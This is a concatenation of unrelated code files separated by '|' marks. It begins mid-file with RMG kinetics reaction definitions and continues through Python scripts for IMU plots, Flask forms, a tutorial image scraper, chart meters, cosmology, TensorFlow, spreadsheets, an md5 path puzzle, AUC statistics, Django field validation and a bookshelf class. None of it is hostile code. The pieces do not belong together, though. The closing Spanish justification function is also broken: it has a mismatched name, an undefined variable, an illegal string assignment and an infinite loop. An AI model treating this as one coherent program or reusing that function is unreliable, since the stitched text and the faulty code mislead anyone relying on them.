label = 'reaction15',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(O)C([O])[O](11583)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(94.0113,'s^-1'), n=2.81534, Ea=(105.641,'kJ/mol'), T0=(1,'K'), comment="""Estimated using average of templates [R4H_SSS;Y_rad_out;O_H_out] + [R4H_SSS;O_rad_out;XH_out] for rate rule [R4H_SSS;O_rad_out;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction16',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['[CH2]CC([O])C(O)O(11584)'],
transitionState = 'TS16',
kinetics = Arrhenius(A=(1.2e+11,'s^-1'), n=0, Ea=(31.8402,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(1000,'K'), comment="""From training reaction 306 used for R5H_CCC;O_rad_out;Cs_H_out_2H
Exact match found for rate rule [R5H_CCC;O_rad_out;Cs_H_out_2H]
Euclidian distance = 0
Multiplied by reaction path degeneracy 3.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction17',
reactants = ['[O][CH]O(171)', 'CC[CH][O](563)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS17',
kinetics = Arrhenius(A=(7.46075e+06,'m^3/(mol*s)'), n=0.027223, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [Y_rad;Y_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -14.4 to 0 kJ/mol."""),
)
reaction(
label = 'reaction18',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(=O)C(O)O(11585)'],
transitionState = 'TS18',
kinetics = Arrhenius(A=(7.437e+08,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3radExo;Y_rad;XH_Rrad]
Euclidian distance = 0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction19',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC(O)C(=O)O(11586)'],
transitionState = 'TS19',
kinetics = Arrhenius(A=(7.437e+08,'s^-1'), n=1.045, Ea=(63.4002,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R3radExo;Y_rad;XH_Rrad]
Euclidian distance = 0
family: Intra_Disproportionation"""),
)
reaction(
label = 'reaction20',
reactants = ['CH2(S)(23)', 'CC([O])C([O])O(1195)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS20',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction21',
reactants = ['CCC([O])C([O])O(11392)'],
products = ['CCC1OOC1O(11396)'],
transitionState = 'TS21',
kinetics = Arrhenius(A=(1.62e+12,'s^-1'), n=-0.305, Ea=(8.28432,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R4_SSS;Y_rad_out;Ypri_rad_out] for rate rule [R4_SSS;O_rad;Opri_rad]
Euclidian distance = 1.41421356237
family: Birad_recombination"""),
)
reaction(
label = 'reaction22',
reactants = ['CCC([O])[CH]OO(11587)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS22',
kinetics = Arrhenius(A=(4.263e+10,'s^-1'), n=0, Ea=(92.7451,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [RnOOH;C_rad_out_H/NonDeC] for rate rule [ROOH;C_rad_out_H/NonDeC]
Euclidian distance = 1.0
family: intra_OH_migration"""),
)
reaction(
label = 'reaction23',
reactants = ['CCC([CH][O])OO(11588)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS23',
kinetics = Arrhenius(A=(3.01978e+11,'s^-1'), n=0, Ea=(107.111,'kJ/mol'), T0=(1,'K'), comment="""Estimated using an average for rate rule [R2OOH_S;Y_rad_out]
Euclidian distance = 0
family: intra_OH_migration"""),
)
reaction(
label = 'reaction24',
reactants = ['O(4)', 'CC[CH]C([O])O(4406)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS24',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_rad/H/NonDeC;O_birad]
Euclidian distance = 3.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction25',
reactants = ['O(4)', 'CCC([O])[CH]O(10835)'],
products = ['CCC([O])C([O])O(11392)'],
transitionState = 'TS25',
kinetics = Arrhenius(A=(2085.55,'m^3/(mol*s)'), n=1.09077, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""Estimated using template [Y_rad;O_birad] for rate rule [C_rad/H/CsO;O_birad]
Euclidian distance = 4.0
family: Birad_R_Recombination
Ea raised from -8.3 to 0 kJ/mol."""),
)
network(
label = '2127',
isomers = [
'CCC([O])C([O])O(11392)',
],
reactants = [
('HOCHO(59)', 'C2H5CHO(70)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '2127',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
|
# -*- coding: utf-8 -*-
"""
Created on Fri Apr 17 12:52:14 2020
@author: Mocki
E-mail : 605095234@qq.com
TO : Art is piece of luxury
"""
import matplotlib.pyplot as plt
from glv import *
class ChkData():
def __init__(self,imu_data):
self.imu_chk = imu_data
self.intv = imu_data.intv
def plot_timef(self,dtype):
fig = plt.figure(figsize=(10,6))
ax = fig.add_subplot(111)
if dtype == "ACC":
X = self.imu_chk.imu_mat("TIM")
Y = self.imu_chk.imu_mat("ACC")
ax.plot(X,Y[:,0],label="ax")
ax.plot(X,Y[:,1],label="ay")
ax.plot(X,Y[:,2],label="az")
ax.legend(loc="best")
elif dtype == "GYO":
X = self.imu_chk.imu_mat("TIM")
Y = self.imu_chk.imu_mat("GYO")
ax.plot(X,Y[:,0],label="gx")
ax.plot(X,Y[:,1],label="gy")
ax.plot(X,Y[:,2],label="gz")
ax.legend(loc="best")
elif dtype == "ALL":
X = self.imu_chk.imu_mat("TIM")
Y = self.imu_chk.imu_mat("ALL")[:,1:]
ax.plot(X,Y[:,0],label="gx")
ax.plot(X,Y[:,1],label="gy")
ax.plot(X,Y[:,2],label="gz")
ax.plot(X,Y[:,3],label="ax")
ax.plot(X,Y[:,4],label="ay")
ax.plot(X,Y[:,5],label="az")
ax.legend(loc="best")
else:
raise Exception("Wrong dtype[%s]." % dtype)
def plot_epoch(self,dtype):
fig = plt.figure(figsize=(10,6))
ax = fig.add_subplot(111)
if dtype == "ACC":
X = self.imu_chk.imu_mat("TIM");X -= X[0]
Y = self.imu_chk.imu_mat("ACC")
ax.plot(X,Y[:,0],label="ax")
ax.plot(X,Y[:,1],label="ay")
ax.plot(X,Y[:,2],label="az")
ax.legend(loc="best")
elif dtype == "GYO":
X = self.imu_chk.imu_mat("TIM");X -= X[0]
Y = self.imu_chk.imu_mat("GYO")
ax.plot(X,Y[:,0],label="gx")
ax.plot(X,Y[:,1],label="gy")
ax.plot(X,Y[:,2],label="gz")
ax.legend(loc="best")
elif dtype == "ALL":
X = self.imu_chk.imu_mat("TIM");X -= X[0]
Y = self.imu_chk.imu_mat("ALL")[:,1:]
ax.plot(X,Y[:,0],label="gx")
ax.plot(X,Y[:,1],label="gy")
ax.plot(X,Y[:,2],label="gz")
ax.plot(X,Y[:,3],label="ax")
ax.plot(X,Y[:,4],label="ay")
ax.plot(X,Y[:,5],label="az")
ax.legend(loc="best")
else:
raise Exception("Wrong dtype[%s]." % dtype)
class Chkalg():
def __init__(self,alg_mat):
self.alg_mat = alg_mat
def plot(self,ptype):
fig = plt.figure(figsize=(10,6))
if ptype == "A":
ax = fig.add_subplot(111)
X = self.alg_mat[:,0]
Y = self.alg_mat[:,1] * R2D
elif ptype == "B":
ax = fig.add_subplot(111)
X = self.alg_mat[:,0]
Y = self.alg_mat[:,2] * R2D
elif ptype == "F":
ax = fig.add_subplot(111)
X = self.alg_mat[:,0]
Y = self.alg_mat[:,3] * R2D
elif ptype == "ALL":
ax = fig.add_subplot(111)
X = self.alg_mat[:,0]
Y = self.alg_mat[:,1:] * R2D
ax.plot(X,Y[:,0],label="alpha")
ax.plot(X,Y[:,1],label="theta")
ax.plot(X,Y[:,2],label="fi")
ax.legend(loc="best")
|
import json
import os
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SelectField, SubmitField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo
from wtforms_alchemy import model_form_factory
from paul.models import User, Card
from paul import db
BaseModelForm = model_form_factory(FlaskForm)
class ModelForm(BaseModelForm):
@classmethod
def get_session(self):
return db.session
tours = json.load(open(os.path.join(os.path.dirname(__file__), 'static', 'tours.json'), 'r'))
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
email = StringField('Email', validators=[DataRequired(), Email()])
password = PasswordField('Password', validators=[DataRequired()])
password2 = PasswordField(
'Repeat Password', validators=[DataRequired(), EqualTo('password')])
sel_tour = SelectField('Select Missionary Tour', validators=[DataRequired()], choices=[(tour, 'Missionary Tour {}'.format(tour)) for tour in ['1', '2', '3']])
submit = SubmitField('Register')
def validate_username(self, username):
user = User.query.filter_by(username=username.data).first()
if user is not None:
raise ValidationError('Please use a different username.')
def validate_email(self, email):
user = User.query.filter_by(email=email.data).first()
if user is not None:
raise ValidationError('Please use a different email address.')
class UserForm(ModelForm):
class Meta:
model = User
submit = SubmitField('Save')
class CardForm(ModelForm):
class Meta:
model = Card
submit = SubmitField('Save') |
import io
import requests
from PIL import Image
from bs4 import BeautifulSoup
BASE_URL = "https://scraping-for-beginner.herokuapp.com"
res = requests.get(BASE_URL+"/image")
soup = BeautifulSoup(res.text, "html.parser")
img_tags = soup.find_all("img")
for i, img_tag in enumerate(img_tags):
img_url = BASE_URL + img_tag["src"]
img = io.BytesIO(requests.get(img_url).content) # url -> img
img = Image.open(img)
img.save(f"img/sample_{i}.png")
|
#!/usr/bin/python
from pychartdir import *
def createChart(chartIndex) :
# The value to display on the meter
value = 75.35
# Create a LinearMeter object of size 260 x 80 pixels with black background and rounded corners
m = LinearMeter(260, 80, 0x000000)
m.setRoundedFrame(Transparent)
# Set the default text and line colors to white (0xffffff)
m.setColor(TextColor, 0xffffff)
m.setColor(LineColor, 0xffffff)
# Set the scale region top-left corner at (15, 24), with size of 228 x 20 pixels. The scale
# labels are located on the top (implies horizontal meter)
m.setMeter(15, 24, 228, 20, Top)
# Set meter scale from 0 - 100, with a tick every 10 units
m.setScale(0, 100, 10)
# Demostrate different types of color scales
smoothColorScale = [0, 0x0000ff, 25, 0x0088ff, 50, 0x00ff00, 75, 0xdddd00, 100, 0xff0000]
stepColorScale = [0, 0x00dd00, 50, 0xffff00, 80, 0xff3333, 100]
highLowColorScale = [0, 0x0000ff, 40, Transparent, 60, Transparent, 100, 0xff0000]
highColorScale = [70, Transparent, 100, 0xff0000]
if chartIndex == 0 :
# Add a blue (0x0088ff) bar from 0 to value with glass effect and 4 pixel rounded corners
m.addBar(0, value, 0x0088ff, glassEffect(NormalGlare, Top), 4)
# Add a 5-pixel thick smooth color scale at y = 48 (below the meter scale)
m.addColorScale(smoothColorScale, 48, 5)
elif chartIndex == 1 :
# Add a purple (0xaa66ff) bar from 0 to value
m.addBar(0, value, 0xaa66ff)
# Add a 4 pixel thick purple (0x880088) frame
m.setThickFrame(4, 0x880088)
# Add a 5-pixel thick high/low color scale at y = 48 (below the meter scale)
m.addColorScale(highLowColorScale, 48, 5)
elif chartIndex == 2 :
# Add a green (0x00ee00) bar from 0 to value with right side soft lighting effect and 4
# pixel rounded corners
m.addBar(0, value, 0x00ee00, softLighting(Right), 4)
# Add a 5-pixel thick step color scale at y = 48 (below the meter scale)
m.addColorScale(stepColorScale, 48, 5)
elif chartIndex == 3 :
# Add an orange (0xff8800) bar from 0 to value with cylinder lighting effect
m.addBar(0, value, 0xff8800, cylinderEffect())
# Add a 4 pixel thick brown (0xbb5500) frame
m.setThickFrame(4, 0xbb5500)
# Add a 5-pixel thick high only color scale at y = 48 (below the meter scale)
m.addColorScale(highColorScale, 48, 5)
elif chartIndex == 4 :
# Add a magneta (0xdd00dd) bar from 0 to value with top side soft lighting effect and 4
# pixel rounded corners
m.addBar(0, value, 0xdd00dd, softLighting(Top), 4)
# Add a 5-pixel thick smooth color scale at y = 48 (below the meter scale)
m.addColorScale(smoothColorScale, 48, 5)
else :
# Add a red (0xff0000) bar from 0 to value with bar lighting effect
m.addBar(0, value, 0xff0000, barLighting())
# Add a 4 pixel thick red (0xaa0000) frame
m.setThickFrame(4, 0xaa0000)
# Add a 5-pixel thick high/low color scale at y = 48 (below the meter scale)
m.addColorScale(highLowColorScale, 48, 5)
# Add a label left aligned to (12, 65) using 8pt Arial Bold font
m.addText(12, 65, "Temperature C", "arialbd.ttf", 8, TextColor, Left)
# Add a text box right aligned to (243, 65). Display the value using white (0xffffff) 8pt Arial
# Bold font on a black (0x000000) background with depressed dark grey (0x333333) rounded border.
t = m.addText(243, 65, m.formatValue(value, "2"), "arial.ttf", 8, 0xffffff, Right)
t.setBackground(0x000000, 0x333333, -1)
t.setRoundedCorners(3)
# Output the chart
m.makeChart("blackhbarmeter%s.png" % chartIndex)
createChart(0)
createChart(1)
createChart(2)
createChart(3)
createChart(4)
createChart(5)
|
__all__ = ("ConcentrationKlypin11",)
from . import Concentration
class ConcentrationKlypin11(Concentration):
"""Concentration-mass relation by `Klypin et al. 2011
<https://arxiv.org/abs/1002.3660>`_. This parametrization is only
valid for S.O. masses with :math:`\\Delta = \\Delta_{\\rm vir}`.
Args:
mass_def (:class:`~pyccl.halos.massdef.MassDef` or :obj:`str`): a mass
definition object or a name string.
"""
name = 'Klypin11'
def __init__(self, *, mass_def="vir"):
super().__init__(mass_def=mass_def)
def _check_mass_def_strict(self, mass_def):
return mass_def.name != "vir"
def _concentration(self, cosmo, M, a):
M_pivot_inv = cosmo["h"] * 1E-12
return 9.6 * (M * M_pivot_inv)**(-0.075)
|
#coding:utf8
import time
def req_IO():
print("start_IO")
time.sleep(5)
print("IO_end")
return "IOisEnd"
def req_a():
print("start_A")
ret = req_IO()
print("ret:%s" % ret)
print("A_end")
def req_b():
print("start_B")
print("end_B")
def main():
#模拟tornado框架
req_a()
req_b()
if __name__ == "__main__":
main()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#cangye@hotmail.com
"""
=====================
sequence-loss
=====================
交叉熵损失函数辅助函数
简化编程流程
"""
import tensorflow as tf
import numpy as np
v1 = tf.constant([[1, 0, 0],
[0, 1, 0],
[0, 0, 1],
[0, 10, 0],
[1, 1, 1]], dtype=tf.float32)
v2 = tf.constant([1, 1, 1, 1, 1], dtype=tf.int32)
loss = (tf.contrib
.legacy_seq2seq
.sequence_loss_by_example([v1],
[v2],
[tf.ones_like(v2, dtype=tf.float32)]))
sess = tf.Session()
print(sess.run(loss))
# [1.5514446e+00 5.5144465e-01 1.5514448e+00 9.0833353e-05 1.0986123e+00]
sess.close() |
import openpyxl
wb = openpyxl.Workbook()
sheet = wb.active
sheet.title = 'mm'
sheet['A1'] = '明明'
row = [['爬虫1','爬虫2','爬虫3'],['爬虫4','爬虫5','爬虫6']]
for i in row:
sheet.append(i)
print(row)
wb.save("mm.xlsx") |
from collections import deque
import copy
from hashlib import md5
from pathlib import Path
import time
import numpy as np
data_folder = Path(__file__).parent.resolve()
def shortest_path(passcode, grid_size=4):
initial_pos = (0, 0)
path = ""
queue = deque([(initial_pos, path)])
while len(queue) > 0:
point, path = queue.pop()
open_choices = _find_choices(point, path, passcode)
for candidate, direction in open_choices:
if (min(candidate) >= 0) and (max(candidate) < grid_size):
if candidate == (grid_size - 1, grid_size - 1):
return path + direction
queue.appendleft((candidate, path + direction))
return None
def longest_path(passcode, grid_size=4):
initial_pos = (0, 0)
path = ""
queue = deque([(initial_pos, path)])
longest_path = 0
while len(queue) > 0:
point, path = queue.pop()
open_choices = _find_choices(point, path, passcode)
for candidate, direction in open_choices:
if (min(candidate) >= 0) and (max(candidate) < grid_size):
if candidate == (grid_size - 1, grid_size - 1):
if len(path) >= longest_path:
longest_path = len(path) + 1
else:
queue.appendleft((candidate, path + direction))
if longest_path == 0:
return None
return longest_path
def _find_choices(point, path, passcode):
candidates = [
(point[0] - 1, point[1]),
(point[0] + 1, point[1]),
(point[0], point[1] - 1),
(point[0], point[1] + 1),
]
directions = ["U", "D", "L", "R"]
hashed_string = md5(f"{passcode}{path}".encode("utf-8")).hexdigest()
choices = list(zip(candidates, directions))
open_choices = []
for i in range(4):
if int(hashed_string[i], 16) > 10:
open_choices.append(choices[i])
return open_choices
def main():
passcode = "udskfozm"
print("Part 1")
print(f"The shortest path to reach the vault is {shortest_path(passcode)}")
print()
print("Part 2")
print(f"The longest path to reach the vault is {longest_path(passcode)} steps")
if __name__ == "__main__":
main()
|
from .base_types import *
from .simple_types import *
from .simple_containers import *
from .lazy import *
from .field_container import *
from .reference import *
|
import pandas as pd
from matplotlib import rcParams
import matplotlib.pyplot as plt
import numpy as np
import os
from sklearn.metrics import roc_auc_score, roc_curve
from sklearn.utils import resample
from inspect import signature
from delong import delong_roc_variance, delong_roc_test
from scipy import stats
def plotMultiPCR(trainpath, ext_testfiles, algo, rcut, her2, prefix='', output_folder=None):
import os
from aux_multiseed_training import getTrainingBands
# Train
train_pCR_means, train_pCR_std = getTrainingBands(trainpath, rcut, 'agnost', her2)
print('Train band means:', train_pCR_means)
print('Train band std:', train_pCR_std)
## Test
test_pCR_bandmeans, test_pCR_bandsds, test_pCR_bandnoms = getWholeTestBand(ext_testfiles, rcut,her2,'pCR')
print('pCR from band noms:', test_pCR_bandnoms)
print('pCR from band means:', test_pCR_bandmeans)
#
fig0, ax0 = plt.subplots(1,1,figsize=(7,5))
if her2=='agnost':
# Draw training bands
ax0.plot(range(6), train_pCR_means, ':', color='#20A39E')
ax0.fill_between(range(6), train_pCR_means+train_pCR_std, train_pCR_means-train_pCR_std, alpha=0.1, color='#20A39E', label='Training')
if her2=='agnost':
ax0.set_ylim([0.58,0.93])
ax0.set_ylabel('AUC')
if her2!='agnost':
ax0.set_title('HER2{} pCR'.format(her2))
plt.setp(ax0.get_xticklabels(), visible=True)
plt.setp(ax0, xticks=range(6), xticklabels=['\nClinical','+\nDNA','+\nRNA','+\nDNA\nRNA','+\nDNA\nRNA\nDigPath','+\nDNA\nRNA\nDigPath\nTreatment'])
#ax0.plot(range(6), test_pCR_bandmeans, '--', color='#20A39E', label='External validation (BS mean)')
ax0.plot(range(6), test_pCR_bandnoms, 'o-', color='#20A39E', label='External validation')
ax0.plot(range(6), test_pCR_bandmeans+test_pCR_bandsds, '-', color='#20A39E', alpha=0.9)
ax0.plot(range(6), test_pCR_bandmeans-test_pCR_bandsds, '-', color='#20A39E', alpha=0.9)
ax0.legend(loc='lower right', fontsize=14)
if output_folder!=None:
plt.savefig(output_folder+'/aucs_vs_feats_her2{}.pdf'.format(her2), bbox_inches='tight', transparent=True)
return train_pCR_means, test_pCR_bandnoms
def getPreds(csv_file, model, feats, algo, rcut):
df = pd.read_csv(csv_file, delimiter=' ', header=None)
patIds = df.iloc[1, 2:-1].values
df = df.iloc[:, :-1] # The last column is just nans
truths = df[(df.loc[:,0]==model) & (df.loc[:,1]=='resp')].values[0][2:]
preds = (df[(df.loc[:,0]=='{}_{}_r{}'.format(model, feats,rcut)) & (df.loc[:,1]==algo)]).values[0][2:]
preds = np.array([float(x) for x in preds if x is not np.nan])
truths = np.array([int(x) for x in truths if x is not np.nan])
pred_df = pd.DataFrame({'ID':patIds, 'preds':preds, 'truths':truths})
return pred_df
def testBands(testfiles, algo, rcut, her2, feats='rna', model='pCR'):
itf = {}
pred_dfs_forseeds = []
for random_state in [1,2,3,4,5]:
itf['neg'] = testfiles['neg']+'_rs{}'.format(random_state)
itf['pos'] = testfiles['pos']+'_rs{}'.format(random_state)
if her2=='agnost':
pred_df_list = []
for her2_i in ['neg', 'pos']:
outputs_name = itf[her2_i]+'/predictions.txt'
pred_df_i = getPreds(outputs_name, model, feats, algo, rcut)
pred_df_list.append(pred_df_i)
pred_df = pd.concat(pred_df_list).reset_index()
else:
outputs_name = itf[her2]+'/predictions.txt'
pred_df = getPreds(outputs_name, model, feats, algo, rcut)
pred_dfs_forseeds.append(pred_df)
# Average the predictions of the 5 random seeds
merged_df = pred_dfs_forseeds[0].copy()
for ii in [1,2,3,4]:
suffix_df = pred_dfs_forseeds[ii].add_suffix('_rs{}'.format(ii+1))
merged_df = pd.merge(merged_df, suffix_df, left_on='ID', right_on='ID_rs{}'.format(ii+1))
series_final_truths = merged_df['truths']
series_final_preds = (merged_df['preds']+merged_df['preds_rs2']+merged_df['preds_rs3']+merged_df['preds_rs4']+merged_df['preds_rs5'])/5
merged_df['final_preds'] = series_final_preds
truths = series_final_truths.values
preds = series_final_preds.values
nom_auc = roc_auc_score(truths, preds)
# Bootstrapping
indices = range(len(truths))
bs_aucs = []
for i in range(100):
bs = resample(indices, replace=True, random_state=i, stratify=truths)
auc = roc_auc_score(truths[bs], preds[bs])
bs_aucs.append(auc)
return np.mean(bs_aucs), np.std(bs_aucs), nom_auc, [truths,preds]
def getWholeTestBand(testfiles, rcut,her2,model,noBev=False):
means = []
sds = []
noms = []
for feats in ['clinical','dna','clin_rna','rna','imag','chemo']:
m,sd,nom,_ = testBands(testfiles, 'avg',rcut,her2,feats=feats,model=model)
means.append(m)
sds.append(sd)
noms.append(nom)
return np.array(means), np.array(sds), np.array(noms)
def getROC(testfiles,rcut,her2,model,feats_list,names_list,output_folder=None,suffix=''):
plt.figure(figsize=(5,5))
plt.plot([0,1],[0,1],':')
line_styles = ['--','-','-.',':','-']
for i,feats in enumerate(feats_list):
_,_,_,v = testBands(testfiles,'avg',rcut,her2,feats=feats,model=model)
truths = v[0]
preds = v[1]
auc = roc_auc_score(truths, preds)
label = '{} (Validation AUC={:.2f})'.format(names_list[i], auc)
fpr, tpr, thresholds = roc_curve(truths, preds)
plt.plot(fpr, tpr, color='k', lw=2, alpha=.8, linestyle=line_styles[i], label=label)
plt.legend(fontsize=14, loc='lower right')
plt.xlabel('FPR')
plt.ylabel('TPR')
if output_folder!=None:
plt.savefig(output_folder+'/roc_her2{}{}.pdf'.format(her2,suffix), bbox_inches='tight', transparent=True)
plt.show()
########### Precision - recall ##############
from sklearn.metrics import precision_recall_curve, average_precision_score, auc
def makeSinglePrec(theax, truths, preds, label, color):
precision, recall, thresholds = precision_recall_curve(truths, preds)
avg_prec = average_precision_score(truths,preds)
prec_auc = auc(recall, precision)
print('Avg. prec = {}; AUC = {}'.format(avg_prec, prec_auc))
step_kwargs = ({'step': 'post'} if 'step' in signature(plt.fill_between).parameters else {})
theax.step(recall, precision, color=color, alpha=0.2, where='post')
theax.fill_between(recall, precision, alpha=0.2, color=color, **step_kwargs, label=label)
def plotPrecRec(testfiles,rcut,her2,model,feats_list,names_list,output_folder=None):
fig, ax = plt.subplots(1,1,figsize=(5,5))
fig.subplots_adjust(hspace=0.4)
colors = ['r','b']
for i,feats in enumerate(feats_list):
_,_,_,v = testBands(testfiles,'avg',rcut,her2,feats=feats,model=model)
truths = v[0]
preds = v[1]
makeSinglePrec(ax, truths, preds, names_list[i], colors[i])
if i==1:
rand_perf = (truths==1).sum()/truths.shape[0]
ax.plot([0, 1], [rand_perf, rand_perf], ':k')
ax.text(0.01, rand_perf+0.02, 'Random performance', size=12)
ax.legend(prop={'size': 12})
ax.set_xlabel('Recall')
ax.set_ylabel('Precision')
if output_folder!=None:
plt.savefig(output_folder+'/prec_recall_her2{}.pdf'.format(her2), bbox_inches='tight', transparent=True)
plt.show()
########### DeLong p-values ############
def getLimits(y_true, y_pred):
alpha = 0.95
auc, auc_cov = delong_roc_variance(y_true,y_pred)
auc_std = np.sqrt(auc_cov)
lower_upper_q = np.abs(np.array([0, 1]) - (1 - alpha) / 2)
ci = stats.norm.ppf(lower_upper_q,loc=auc,scale=auc_std)
ci[ci > 1] = 1
print('AUC:', auc)
print('AUC COV:', auc_cov)
print('95% AUC CI:', ci)
return [auc,auc_cov,ci]
def plotDeLongCIs(testfiles,rcut,her2,model,feats_list,names_list,output_folder=None,suffix=''):
plt.figure(figsize=(4,5))
plt.plot([-0.5,len(names_list)],[0.5,0.5],':k')
all_truths = []
all_preds = []
for i,feats in enumerate(feats_list):
_,_,_,v = testBands(testfiles,'avg',rcut,her2,feats=feats,model=model)
truths = v[0]
preds = v[1]
auc = getLimits(truths, preds)
plt.vlines(i, auc[2][0], auc[2][1])
plt.plot(i, auc[0], 'ok', label=names_list[i], markersize=9)
all_truths.append(truths)
all_preds.append(preds)
# pval
pval = delong_roc_test(all_truths[0], all_preds[0], all_preds[1])
thepval = np.power(10,pval[0])[0]
print(thepval)
x1, x2 = 0, 1 # columns 'Sat' and 'Sun' (first column: 0, see plt.xticks())
y, h, col = 1.01, 0.02, 'k'
plt.plot([x1, x1, x2, x2], [y, y+h, y+h, y], lw=1.5, c=col)
plt.text((x1+x2)*.5, y+h, 'p={:.2f}'.format(thepval), ha='center', va='bottom', color=col)
plt.ylabel('AUC')
plt.xlim([-0.5,len(names_list)-0.5])
plt.text(0.55,0.51,'AUC=0.5',size=13)
plt.xticks(range(len(names_list)),names_list,rotation=85)
plt.savefig(output_folder+'/delong_her2{}{}.pdf'.format(her2,suffix), bbox_inches='tight', transparent=True)
plt.show()
|
from django.apps import apps
from django.db.models.base import ModelBase
from .exceptions import (
JSONFieldModelTypeError,
JSONFieldModelError,
JSONFieldValueError
)
class JSONField:
types = (int, float, str, bool)
def __init__(self, field_type=None, required=False, default=None,
blank=True, model=None, field=''):
if field_type not in self.types:
raise JSONFieldValueError('field_type should be one of: {}'.format(
str(self.types).replace("<class '", '').replace("'>", '')))
self.field_type = field_type
self.required = required or (not blank)
self.default = default
self.blank = blank
self.key = ''
self.model = self._set_model(model)
self.field = field
if model and not field:
self.field = 'id'
# if not self.var_type:
# raise ValueError('var_type should be specified')
def check_type(self, value):
messages = []
try:
_value = self.field_type(value)
except (TypeError, ValueError):
messages.append('Could not treat {} value `{}` as {}'.format(
self.key or '', value, self.field_type))
_value = None
return _value, messages
def validate(self, key, value):
self.key = key
messages = []
if self.required and (value is None):
messages.append('`{}` value is required'.format(key))
else:
if not self.blank and value == '':
messages.append('`{}` value blank is not allowed'.format(key))
elif (self.default is not None) and (value is None):
value = self.default
if messages:
value = None
else:
value, msg = self.check_type(value)
messages += msg
return value, messages
@staticmethod
def _set_model(model):
if not model:
return None
elif isinstance(model, ModelBase):
return model
elif isinstance(model, str):
try:
app, _model = model.split('.')
model = apps.get_model(app, _model)
except (ValueError, LookupError):
raise JSONFieldModelError('model name does not match pattern '
'<application>.<Model> or model '
'does not exist')
return model
else:
raise JSONFieldModelTypeError('wrong model type (NoneType, string '
'or ModelBase allowed)')
class String(JSONField):
def __init__(self,
required=False, default=None,
blank=True, model=None, field=''):
super().__init__(field_type=str, required=required, default=default,
blank=blank, model=model, field=field)
class Int(JSONField):
def __init__(self,
required=False, default=None,
blank=True, model=None, field=''):
super().__init__(field_type=int, required=required, default=default,
blank=blank, model=model, field=field)
class Float(JSONField):
def __init__(self,
required=False, default=None,
blank=True, model=None, field=''):
super().__init__(field_type=float, required=required, default=default,
blank=blank, model=model, field=field)
class Bool(JSONField):
def __init__(self,
required=False, default=None,
blank=True, model=None, field=''):
super().__init__(field_type=bool, required=required, default=default,
blank=blank, model=model, field=field)
|
class Bok:
def __init__(self, navn, forfatter,aar):
self._navn = navn
self._forfatter = forfatter
self._aar = aar
def hentNavn(self):
return self._navn
def hentAar(self):
return self._aar
def printBok(self):
print("Navnet på boken: ", self._navn, "Forfatteren: ", self._forfatter, "Utgivelsesår: ", self._aar)
class Bokhylle:
def __init__(self, maksplass):
self._maksplass = maksplass
self._listeBoker = []
def leggTilBok(self, enBok):
if len(self._listeBoker) < self._maksplass:
self._listeBoker.append(enBok)
return True
return False
def erDetPlass(self):
if len(self._listeBoker) < self._maksplass:
return True
return False
def finnBok(self, navn, aar):
for bok in self._listeBoker:
if (bok.hentNavn() == navn) and (bok.hentAar() == aar):
return bok
return False
def printBokhylle(self):
for boker in self._listeBoker:
boker.printBok()
bokhylle = Bokhylle(7)
bok1 = Bok("Versace", "Harald", 1976)
bok2 = Bok("Swag", "Meg", 3005)
bokhylle.leggTilBok(bok1)
bokhylle.leggTilBok(bok2)
bokhylle.printBokhylle()
|
def justficador (linea):
if len(linea) > 30:
while len(linea) > 30:
linea += ' '
linea += '\n'
elif len(line) == 30:
linea += '\n'
else:
linea[30] += '\n'
justificador(linea)
print(linea)
